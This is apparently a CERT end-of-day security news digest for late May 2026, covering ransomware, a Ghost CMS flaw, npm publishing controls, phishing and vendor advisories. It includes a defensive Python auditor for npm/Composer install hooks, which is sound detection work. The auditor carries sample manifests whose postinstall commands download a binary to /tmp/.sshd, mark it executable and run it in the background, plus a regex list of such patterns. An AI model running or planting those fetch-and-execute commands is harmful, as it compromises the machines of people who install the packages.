End-of-Day report
Timeframe: Friday 22-05-2026 18:00 - Tuesday 26-05-2026 18:00
Handler: Michael Schlagenhaufer
Co-Handler: Alexander Riepl
News
Update #1: Qilin ransomware uses initial access from the ZipLine campaign - DACH recruiting domains in focus
We have become aware of further lure domains that follow the same pattern: valenzsearch[.]at, haasrecruiting[.]at, bergersearch[.]at
https://www.cert.at/de/aktuelles/2026/5/zipline-qilin-raas-update
Anthropic to release Mythos-class models to the public
Anthropic has revealed its intention to one day release models that match the performance of its Mythos bug-finding AI to the public, once it can make them safe.
https://www.theregister.com/security/2026/05/25/anthropic-to-release-mythos-class-models-to-the-public/5245596
Critical Ghost CMS Vulnerability Exploited to Hack 700+ Websites
A critical Ghost CMS vulnerability identified as CVE-2026-26980 has been exploited in a widespread cyber campaign that compromised more than 700 websites, including platforms associated with major institutions such as Harvard University, University of Oxford, and DuckDuckGo. [..] The flaw received a CVSS severity score of 9.4, highlighting the serious risks posed by CVE-2026-26980. The vulnerability was reportedly discovered by Anthropic using its Claude AI system. [..] Investigators noted that a DLL file involved in the campaign carried a compilation timestamp dated February 16, 2026 [..] The malicious activity was first detected on May 7, 2026.
https://thecyberexpress.com/cve-2026-26980-ghost-cms-vulnerability/
GitHub: Staged publishing and new install-time controls for npm
Staged publishing is now generally available on npm. Instead of a direct publish that immediately makes a package version available to consumers, the prebuilt tarball is uploaded to a stage queue where a maintainer must explicitly approve it before it becomes installable.
https://github.blog/changelog/2026-05-22-staged-publishing-and-new-install-time-controls-for-npm/
Malicious Postinstall Hook Found Across 700+ GitHub Repositories, Including Packagist and Node.js Projects
Socket researchers identified a coordinated supply chain campaign affecting eight packages on Packagist whose upstream repositories were modified to include the same malicious postinstall script. The script attempted to download a Linux binary from a GitHub Releases URL, save it to /tmp/.sshd, make it executable, and run it in the background.
https://socket.dev/blog/malicious-postinstall-hook-found-across-700-github-repos
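The hook described in the Socket entry above runs at install time, so the practical check is to audit the lifecycle scripts of every manifest in a checkout, node_modules or vendor tree before they run. The following is an added example, not code from Socket or from any of the affected projects: it extracts install-time hooks from package.json (npm) and composer.json (Packagist/Composer) and flags commands that match the pattern the report describes (download from a GitHub Releases URL, drop into /tmp, chmod, background execution). The heuristics, the hook lists and the two sample manifests are constructed for the demo and are not the real payload.

```python
"""Audit install-time hooks in npm (package.json) and Composer (composer.json) manifests.

Added example, not code from the Socket report or the affected projects. The sample
manifests below are constructed to mirror the behaviour the report describes.
"""
import json
import re
import sys
from pathlib import Path

# Lifecycle events that execute arbitrary commands when a package is installed.
NPM_HOOKS = {"preinstall", "install", "postinstall", "prepare", "prepublish"}
COMPOSER_HOOKS = {
    "pre-install-cmd", "post-install-cmd", "pre-update-cmd", "post-update-cmd",
    "pre-autoload-dump", "post-autoload-dump", "post-root-package-install",
    "post-create-project-cmd",
}

# Heuristics modelled on the hook described above (download, drop in /tmp, chmod, background).
SUSPICIOUS = [
    (r"\b(curl|wget)\b.*https?://", "downloads from a URL"),
    (r"github\.com/\S+/releases/download/", "fetches a GitHub Releases artifact"),
    (r"/tmp/\.?\S+", "writes to /tmp"),
    (r"\bchmod\s+(\+x|[0-7]{3,4})\b", "marks a file executable"),
    (r"(?<![&\w])&(?![&\w])|\bnohup\b|\bsetsid\b", "runs in the background"),
    (r"\bbase64\s+(-d|--decode)\b", "decodes a base64 payload"),
    (r"\|\s*(sh|bash)\b", "pipes into a shell"),
]


def hook_commands(manifest, kind):
    """Yield (event, command) for every install-time hook in a parsed manifest."""
    hooks = NPM_HOOKS if kind == "npm" else COMPOSER_HOOKS
    scripts = manifest.get("scripts") or {}
    if not isinstance(scripts, dict):
        return
    for event, value in scripts.items():
        if event not in hooks:
            continue
        for cmd in value if isinstance(value, list) else [value]:
            if isinstance(cmd, str):  # Composer also allows class callbacks; those are skipped
                yield event, cmd


def audit_manifest(text, kind):
    """Return [(event, command, reasons)] for hooks that match at least one heuristic."""
    findings = []
    for event, cmd in hook_commands(json.loads(text), kind):
        reasons = [why for pattern, why in SUSPICIOUS if re.search(pattern, cmd)]
        if reasons:
            findings.append((event, cmd, reasons))
    return findings


def audit_tree(root):
    """Audit every package.json / composer.json below root (a checkout, node_modules or vendor)."""
    kinds = {"package.json": "npm", "composer.json": "composer"}
    results = {}
    for path in Path(root).rglob("*.json"):
        kind = kinds.get(path.name)
        if kind is None:
            continue
        try:
            findings = audit_manifest(path.read_text(encoding="utf-8"), kind)
        except (OSError, ValueError):  # unreadable file or not valid JSON
            continue
        if findings:
            results[str(path)] = findings
    return results


# Constructed samples (not the real payload): the shape of the hook the report describes.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-lib", "version": "1.2.3",
    "scripts": {
        "test": "node test.js",
        "postinstall": "curl -fsSL https://github.com/example/example/releases/download/v1/agent "
                       "-o /tmp/.sshd && chmod +x /tmp/.sshd && /tmp/.sshd &",
    },
})
SAMPLE_COMPOSER_JSON = json.dumps({
    "name": "example/lib",
    "scripts": {
        "post-install-cmd": [
            "@php -r \"echo 'ok';\"",
            "sh -c 'wget -q https://github.com/example/example/releases/download/v1/agent "
            "-O /tmp/.sshd; chmod 755 /tmp/.sshd; nohup /tmp/.sshd >/dev/null 2>&1 &'",
        ],
        "post-update-cmd": "php artisan cache:clear",
    },
})

if __name__ == "__main__":
    if len(sys.argv) > 1:  # python audit_hooks.py <directory>
        for path, findings in audit_tree(sys.argv[1]).items():
            for event, cmd, reasons in findings:
                print(f"{path}: {event}: {', '.join(reasons)}\n    {cmd}")
    else:
        print(audit_manifest(SAMPLE_PACKAGE_JSON, "npm"))
        print(audit_manifest(SAMPLE_COMPOSER_JSON, "composer"))
```

Run it against a freshly cloned repository or an existing node_modules/vendor tree before installing; the heuristics are deliberately loose (a legitimate build step that writes to /tmp will be listed too), so treat a hit as something to read, not as a verdict. Combined with the npm staged-publishing and install-time controls announced in the GitHub entry above, this catches the case where an upstream repository, rather than the registry package, was modified.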
Fake software on GitHub and SourceForge distribute Deno RAT
We found fake installers and plugins for ChatGPT, Claude, AutoTune, and other popular software that can give attackers full control over your device. [..] The infection chain is usually started via MSI files or PowerShell scripts downloaded from GitHub or SourceForge in most of the analyzed cases.
https://www.malwarebytes.com/blog/threat-intel/2026/05/fake-software-on-github-and-sourceforge-distribute-deno-rat
Call, WhatsApp, QR code: new phishing scheme targets Erste Bank customers
Criminals are currently posing as Erste Bank employees and asking their victims via WhatsApp to send them an activation QR code for George. Anyone who passes on the code gives the perpetrators access to the account.
https://www.watchlist-internet.at/news/qr-code-erste-bank/
Scammers have been sending scam emails from an official Microsoft address for months
Scammers are able to send messages from an official Microsoft email address. The same address is also used to send two-factor authentication codes. [..] The sender address used is "msonlineservicesteam@microsoftonline.com".
https://www.derstandard.at/story/3000000322088/betrueger-verschicken-seit-monaten-scam-mails-von-offizieller-microsoft-adresse
DBIR 2026: vulnerabilities are the most common entry point for attacks
Although the report (DBIR 2026) is still based on data from 2025 and therefore predates the most recent advances in frontier AI models, the trends are clear: AI is fundamentally changing the cybersecurity industry. [..] Almost a third (31%) of all breaches begin with the exploitation of a vulnerability.
https://borncity.com/blog/2026/05/25/dbir-2026-sicherheitsluecken-sind-das-haeufigste-einfallstor-fuer-angriffe/
2 PhaaS 2 Furious: The Evolution of Chinese-language Phishing Services
While Russian-speaking threat actors have historically dominated the phishing-as-a-service (PhaaS) landscape, a rival ecosystem is rapidly growing within the Chinese-language underground.
https://cloud.google.com/blog/topics/threat-intelligence/chinese-language-phishing-services/
Six Signals for Threat Attribution
Credible threat attribution weighs six signals together. Each signal has a disciplined methodology behind it, with citations and stress tests to back the conclusions.
https://zeltser.com/six-signals-for-threat-attribution
Noroboto: Lying fonts and mitigation in Rust
The "noroboto.ttf" "lexploit" is straightforward: create a new malicious font definition which is embedded in a document according to the specification and lies about the Unicode representation of its glyphs.
https://tritium.legal/blog/noroboto
Detection Logic Bugs, Developing Context to Bypass MiniPlasma Rules
Recently, because of Nightmare-eclipse's Green Plasma and MiniPlasma variants, it's been a busy week. There are tons of community detection rules out there now. But as someone who practices Adversarial Detection Engineering, that is, hunting for bugs in detection logic, you know that small tweaks can bypass detection.
https://detect.fyi/detection-logic-bugs-developing-context-to-bypass-miniplasma-rules-903f1d7c68e8?source=rssd5fd8f494f6a4
Remove SPNs and Fix Kerberoasting
Remediate Kerberoasting vulnerabilities by removing SPNs for accounts that don't need them.
https://projectblack.io/blog/remove-spn-fix-kerberoasting/
NISG 2026: the practical 6-month roadmap for Austrian companies
October 1, 2026 is not a soft target date. From that day on, the Network and Information Systems Security Act NISG 2026 applies in full in Austria [..] This roadmap sets out concretely what needs to be done over the next 6 months, so that an IT manager or a managing director can start tomorrow.
https://www.zettasecure.com//post//nisg-2026-fahrplan-oesterreich
Vulnerabilities
Roundcube: Security updates 1.6.16 and 1.7.1 released
We just published security updates to the 1.6 LTS and 1.7 versions of Roundcube Webmail. They both contain fixes for recently reported security vulnerabilities.
https://roundcube.net/news/2026/05/24/security-updates-1.6.16-and-1.7.1
Debian SE Linux and PinTheft
PinTheft is a Linux local privilege escalation exploit for an RDS zerocopy double-free that can be turned into a page-cache overwrite through io_uring fixed buffers. [..] We duped on this bug with some other teams and a patch is available so we are releasing our PoC.
https://etbe.coker.com.au/2026/05/24/debian-selinux-pintheft/
Splunk: SVD-2026-0504: Denial of Service through coldToFrozen.sh Script in Splunk Enterprise
https://advisory.splunk.com//advisories/SVD-2026-0504
LWN: Security updates for Tuesday
https://lwn.net/Articles/1074443/
Synology-SA-26:10 Synology Chat Server
https://www.synology.com/en-global/support/security/Synology_SA_26_10
MISP 2.5.38 - UI and security update
https://www.misp-project.org/2026/05/26/misp.2.5.38.released.html/
Zyxel security advisory for missing authorization vulnerability in GS1200v3 series switches
https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-missing-authorization-vulnerability-in-gs1200v3-series-switches-05-26-2026